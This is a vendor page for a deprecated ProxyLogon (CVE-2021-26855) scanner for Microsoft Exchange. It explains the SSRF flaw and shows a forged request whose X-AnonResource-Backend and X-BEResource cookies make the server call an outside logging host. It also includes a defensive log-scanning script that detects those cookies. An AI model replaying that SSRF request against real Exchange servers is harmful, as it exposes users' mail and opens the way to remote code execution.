Infrastructure Testing

ProxyLogon Scanner

Detect Microsoft Exchange servers vulnerable to Server-Side Request Forgery (CVE-2021-26855).

This tool is deprecated

This vulnerability scanner is now included in our Network Vulnerability Scan with OpenVAS.

Detect Microsoft Exchange servers vulnerable to Server-Side Request Forgery faster and discover if your systems are exposed to this critical security flaw.

Get findings in minutes and export a pentesting report focused on the vulnerability, including description, evidence, risk, and actionable recommendations for fixing it.

Reporting

Sample Report

Here is a ProxyLogon Scanner sample report that gives you a taste of how our tools save you time and reduce repetitive manual work.

  • Contains evidence for the discovered vulnerability (HTTP request and response)

  • Shows risk details and exploit information

  • Includes recommendations for fixing the issue

ProxyLogon Scanner Report Sample

How to use the pentesting tool

Use Cases for ProxyLogon Scanner

The tool can be used to check if the email server (Microsoft Exchange) is affected by CVE-2021-26855, an SSRF vulnerability which can lead to disclosure of sensitive information and to Remote Code Execution.

    Better vulnerability discovery. Faster pentest reporting.

    Get instant access to custom vulnerability scanners and automation features that simplify the pentesting process and produce valuable results. The platform helps you cover all the stages of an engagement, from information gathering to website scanning, network scanning, exploitation and reporting.


    Technical Details

    CVE-2021-26855 is a Server-Side Request Forgery (SSRF) vulnerability in Microsoft Exchange Server. An unauthenticated, remote attacker can use it to make the Exchange service initiate HTTPS requests to arbitrary locations. These requests are made in the name of the Exchange service, so they are authenticated and include access tokens and other sensitive data.

    As a direct result, a malicious actor could forge requests to read the emails of the users configured on that email server.

    A forged request includes interesting pieces of data such as X-Sourcecafeserver, X-Commonaccesstoken and ClientId. Here is what a full HTTP request initiated by the Exchange server looks like:

    Connection: Keep-Alive
    Cookie: X-AnonResource=true; X-AnonResource-Backend=pentest-tools.com/logger/etlWuwSzO8/ecp/default.flt?~1; X-BEResource=localhost; ClientId=9HWXKYJ0HUEBVKM0GMVIFW
    Host: pentest-tools.com
    X-Vdirobjectid: 3f80c757-01a3-4edc-b546-371ee214b8ed
    X-Commonaccesstoken: VgEAVAlBbm9ueW1vdXNDAEUAAAAA
    X-Sourcecafeserver: EXH01-1.AVDOC.LOCAL
    X-Isfromcafe: 1
    Msexchproxyuri: https://10.137.1.30/owa/auth/abcd.png
    X-Msexchangeactivityctx: V=1.0.0.0;Id=2310929a-3832-4ef5-851d-80927454aafa;C=;P=
    X-Originalrequesthostschemeport: 443:https:10.137.1.1
    X-Originalrequesthost: 10.137.1.30
    User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:60.0) Gecko/20110101 Firefox/60.0
    Accept: */*
    X-Excompid: ClientAccessFrontEnd
    X-Forwarded-Port: 47750
    X-Forwarded-For: 10.137.1.1
    Content-Length: 0
    

    When exploited together with another vulnerability, such as CVE-2021-27065 (post-authentication file write), this vulnerability can lead to unauthenticated Remote Code Execution on the Exchange server. This attack chain was named ProxyLogon.

    The ProxyLogon attack was widely used to exploit a large number of Microsoft Exchange servers exposed to the Internet by creating web shells in various locations on the file system.

    We recommend performing an in-depth review of vulnerable Exchange servers to check whether they have already been exploited by malicious actors.

    Microsoft has released a tool to verify whether new files are present on the Exchange server: https://github.com/microsoft/CSS-Exchange/tree/main/Security

    More details about this vulnerability:

    Parameters

    Parameter    Description
    Target       This is the URL of the target Outlook Web Access (OWA) server.

    How it works

    The scanner attempts to trigger the SSRF vulnerability by making the target Exchange server read a remote file located at: https://pentest-tools.com/file.txt

    If the file contents are found in the server's HTTP response, the target is declared vulnerable.
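    The forwarded request above carries the X-AnonResource-Backend and X-BEResource cookies that steer the Exchange front end toward an attacker-chosen backend. The following detection script is an added example, not Pentest-Tools.com code: it walks constructed web-server log lines (assumed W3C field order with the cs(Cookie) field enabled, which is not the IIS default) and reports requests to OWA/ECP paths that carry either cookie, together with the backend host the server was pointed at.

```python
import re
from typing import List, Optional, Tuple

# Cookie names carried by the forwarded request shown on this page.
SSRF_COOKIES = ("X-AnonResource-Backend", "X-BEResource")
# The SSRF rides on OWA/ECP paths that unauthenticated clients may request.
PATH_RE = re.compile(r"^/(owa|ecp)/", re.IGNORECASE)

# Constructed sample lines (not from a real server). Assumed field order:
# date time c-ip cs-method cs-uri-stem sc-status cs(Cookie); IIS logs '+' for spaces.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem sc-status cs(Cookie)
2021-03-03 10:15:01 10.137.1.1 GET /owa/auth/abcd.png 200 X-AnonResource=true;+X-AnonResource-Backend=pentest-tools.com/logger/etlWuwSzO8/ecp/default.flt?~1;+X-BEResource=localhost
2021-03-03 10:15:02 10.137.1.7 GET /owa/auth/logon.aspx 200 OutlookSession=abc123
2021-03-03 10:15:03 10.137.1.1 GET /ecp/default.flt 500 X-BEResource=localhost~1
"""


def ssrf_cookie(cookie_field: str) -> Optional[Tuple[str, str]]:
    """Return (cookie name, backend host) for the first SSRF cookie, else None."""
    for part in cookie_field.replace("+", " ").split(";"):
        name, _, value = part.strip().partition("=")
        if name in SSRF_COOKIES:
            # Value looks like "host[/path][~n]"; keep only the host.
            return name, value.split("/", 1)[0].split("~", 1)[0]
    return None


def parse_line(line: str) -> Optional[dict]:
    """Split one log line into a record; directives and short lines give None."""
    if line.startswith("#"):
        return None
    fields = line.split(" ", 6)
    if len(fields) != 7:
        return None
    _date, _time, client, method, path, status, cookie = fields
    return {"client": client, "method": method, "path": path,
            "status": int(status), "cookie": cookie}


def scan(log_text: str) -> List[dict]:
    """One finding per line that hits an OWA/ECP path with an SSRF cookie."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None or not PATH_RE.match(rec["path"]):
            continue
        hit = ssrf_cookie(rec["cookie"])
        if hit is not None:
            rec["cookie_name"], rec["backend"] = hit
            findings.append(rec)
    return findings
```

    A backend value that is not one of your own Exchange hosts (here, pentest-tools.com) is the evidence worth triaging; a 500 response does not mean the probe failed, only that the proxied request did not complete.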

    Frequently Asked Questions for ProxyLogon Scanner

    If your question is not covered here, please check out our Support Center or contact us.

    Why are some tools deprecated on Pentest-Tools.com?

    Short answer: to keep the platform in top shape and keep it clutter-free!

    Long answer: we deprecate tools on Pentest-Tools.com after a detailed analysis from our dev team. If there’s a better way to use the tool’s functionality, we’ll always strive for integration and reliability.

    Most often, the decision to integrate a tool and its capabilities into a more complex one is to provide you with the option to get more complex and more detailed findings in a single scan.

    Looking to understand more about deprecated tools? This article in our Support Center is just what you need.

    Can I continue scanning with the deprecated tool?

    The ProxyLogon Scanner isn’t going anywhere, but you can no longer use it on its own. However, you can now check your systems for Microsoft Exchange servers vulnerable to Server-Side Request Forgery (CVE-2021-26855) with Network Vulnerability Scan with OpenVAS.

    Keep an eye on our changelog, blog, and on our LinkedIn page to be the first to know when we make new changes to the platform. Or you could just subscribe in the email form you can find at the bottom of this page.